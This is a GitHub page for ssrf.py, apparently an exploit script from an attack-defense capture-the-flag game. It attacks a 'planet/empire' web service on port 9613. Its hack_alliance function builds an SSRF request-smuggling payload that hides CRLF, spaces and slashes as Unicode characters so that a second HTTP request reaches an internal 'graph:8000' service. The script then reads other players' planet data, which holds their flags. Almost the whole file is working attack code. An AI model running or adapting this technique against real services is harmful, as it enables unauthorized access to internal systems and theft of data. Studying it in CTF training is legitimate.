-
Notifications
You must be signed in to change notification settings - Fork 5
/
ssrf.py
executable file
·127 lines (90 loc) · 2.34 KB
/
ssrf.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
#!/usr/bin/env python3
import requests
import sys
from checklib import *
ip = sys.argv[1]
hint = sys.argv[2]
urlg = f"http://{ip}:9613/api"
def register(s, u, p):
url = f'{urlg}/register/'
r = s.post(url, json={
'username': u,
'password': p
})
def login(s, u, p):
url = f'{urlg}/login/'
r = s.post(url, json={
'username': u,
'password': p
})
def create_empire(s, name):
url = f'{urlg}/empire/create/'
r = s.post(url, json={
"name": name
})
return r.json()["ok"]
def create_planet(s, name, info, graph):
url = f'{urlg}/planet/create/'
r = s.post(url, json={
"name": name,
"info": info,
"graph": graph
})
return r.json()["ok"]
def create_alliance(s, l, r):
url = f'{urlg}/alliance/create/'
r = s.post(url, json={
"l": l,
"r": r,
})
return r.json()["ok"]
def get_users(s):
url = f'{urlg}/user/list/'
r = s.get(url)
return r.json()["ok"]
def get_user_empires(s, uid):
url = f'{urlg}/user/{uid}/empires/'
r = s.get(url)
return r.json()["ok"]
def get_empire(s, eid):
url = f'{urlg}/empire/{eid}/'
r = s.get(url)
return r.json()["ok"]
def hack_alliance(s, pid, l, r):
url = f'{urlg}/alliance/create/'
payload = ""
payload += "1337 HTTP/1.1\r\nHost: graph:8000\r\n\r\n"
payload += f"GET /api/link/{l}/{r}"
dct = {
' ': '\u0120',
':': '\u013a',
'\r': '\u010d',
'\n': '\u010a',
'/': '\u012f',
}
for i in dct:
payload = payload.replace(i, dct[i])
r = s.post(url, json={
"l": pid,
"r": payload,
})
def get_planet(s, pid):
url = f'{urlg}/planet/{pid}/'
r = s.get(url)
return r.json()["ok"]["info"]
u, p = rnd_username(), rnd_password()
s = get_initialized_session()
register(s, u, p)
login(s, u, p)
uid_attack = hint
for eid_attack in get_user_empires(s, uid_attack):
e_attack = get_empire(s, eid_attack)
for pid_attack in e_attack['nodes']:
ename = rnd_string(10)
eid = create_empire(s, ename)
pname = rnd_string(10)
pinfo = rnd_string(10)
pid = create_planet(s, pname, pinfo, eid)
create_alliance(s, pid, pid_attack)
hack_alliance(s, pid, pid_attack, pid)
print(get_planet(s, pid_attack), flush=True)